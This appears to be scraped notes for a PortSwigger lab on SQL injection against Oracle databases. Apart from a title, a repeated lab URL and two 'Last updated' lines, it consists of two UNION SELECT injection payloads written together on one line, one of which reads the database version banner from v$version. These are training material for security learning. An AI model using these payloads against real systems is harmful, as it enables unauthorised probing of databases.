SQL injection attack, querying the database type and version on Oracle
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle






Last updated
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle






Last updated
' UNION SELECT 'test','test' FROM dual--' UNION SELECT BANNER, NULL FROM v$version--